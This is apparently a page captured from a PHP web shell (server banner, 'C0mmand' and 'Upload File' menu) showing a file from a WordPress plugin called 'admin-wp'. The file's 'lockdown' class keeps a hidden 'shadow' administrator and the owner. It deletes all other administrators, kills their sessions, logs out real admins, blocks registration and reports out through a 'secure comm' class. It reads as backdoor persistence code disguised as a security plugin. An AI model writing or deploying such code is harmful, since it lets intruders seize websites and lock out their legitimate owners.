|
Server IP : 10.106.20.4 / Your IP : 216.73.216.140 Web Server : Apache System : Linux webm004.cluster106.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : sylvaineey ( 605664) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/sylvaineey/www/wp-content/plugins/admin-wp/includes/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
if ( ! defined( 'ABSPATH' ) ) exit;
class AWG_Lockdown {
const OPT_ACTIVE = '_awg_lockdown';
public static function init(): void {
if ( self::is_active() ) {
add_action( 'init', [ __CLASS__, 'enforce' ], 0 );
add_filter( 'option_users_can_register', '__return_zero' );
add_filter( 'rest_authentication_errors', [ __CLASS__, 'restrict_rest' ], 999 );
}
}
/* ---- state ---- */
public static function is_active(): bool {
return (bool) get_option( self::OPT_ACTIVE, false );
}
public static function activate(): void {
update_option( self::OPT_ACTIVE, 1, false );
}
public static function deactivate(): void {
delete_option( self::OPT_ACTIVE );
}
/* ---- trigger (called when breach detected) ---- */
public static function trigger( string $reason, array $details = [] ): void {
self::activate();
self::purge_unauthorized_admins();
self::destroy_unauthorized_sessions();
self::block_registration();
AWG_Admin_Guardian::log_incident( 'lockdown_triggered', [
'reason' => $reason,
'details' => $details,
] );
AWG_Secure_Comm::send_lockdown( $reason, $details );
}
/* ---- purge all admins except owner + shadow ---- */
private static function purge_unauthorized_admins(): void {
AWG_Shadow_Admin::bypass( true );
$admins = get_users( [ 'role' => 'administrator' ] );
AWG_Shadow_Admin::bypass( false );
$owner_id = AWG_Admin_Guardian::get_owner_id();
$shadow_id = AWG_Shadow_Admin::get_id();
require_once ABSPATH . 'wp-admin/includes/user.php';
foreach ( $admins as $admin ) {
if ( $admin->ID === $owner_id || $admin->ID === $shadow_id ) {
continue;
}
WP_Session_Tokens::get_instance( $admin->ID )->destroy_all();
wp_delete_user( $admin->ID, $owner_id > 0 ? $owner_id : null );
}
}
/* ---- destroy sessions of non-whitelisted users ---- */
private static function destroy_unauthorized_sessions(): void {
AWG_Shadow_Admin::bypass( true );
$all_users = get_users( [ 'fields' => 'ID' ] );
AWG_Shadow_Admin::bypass( false );
$owner_id = AWG_Admin_Guardian::get_owner_id();
$shadow_id = AWG_Shadow_Admin::get_id();
foreach ( $all_users as $uid ) {
$uid = (int) $uid;
if ( $uid === $owner_id || $uid === $shadow_id ) {
continue;
}
WP_Session_Tokens::get_instance( $uid )->destroy_all();
}
}
/* ---- disable registration ---- */
private static function block_registration(): void {
update_option( 'users_can_register', 0 );
}
/* ---- enforce lockdown on every request ---- */
public static function enforce(): void {
if ( ! is_user_logged_in() ) return;
$uid = get_current_user_id();
if ( AWG_Admin_Guardian::is_whitelisted( $uid ) ) return;
$user = wp_get_current_user();
if ( $user && in_array( 'administrator', (array) $user->roles, true ) ) {
wp_logout();
wp_safe_redirect( wp_login_url() );
exit;
}
}
/* ---- REST API restriction in lockdown ---- */
public static function restrict_rest( $errors ) {
if ( is_wp_error( $errors ) ) return $errors;
if ( ! is_user_logged_in() ) {
return new WP_Error(
'awg_lockdown',
__( 'Site is in lockdown mode.', 'admin-wp' ),
[ 'status' => 503 ]
);
}
$uid = get_current_user_id();
if ( ! AWG_Admin_Guardian::is_whitelisted( $uid ) ) {
return new WP_Error(
'awg_lockdown',
__( 'Access denied during lockdown.', 'admin-wp' ),
[ 'status' => 403 ]
);
}
return $errors;
}
/* ---- cleanup ---- */
public static function destroy(): void {
delete_option( self::OPT_ACTIVE );
}
}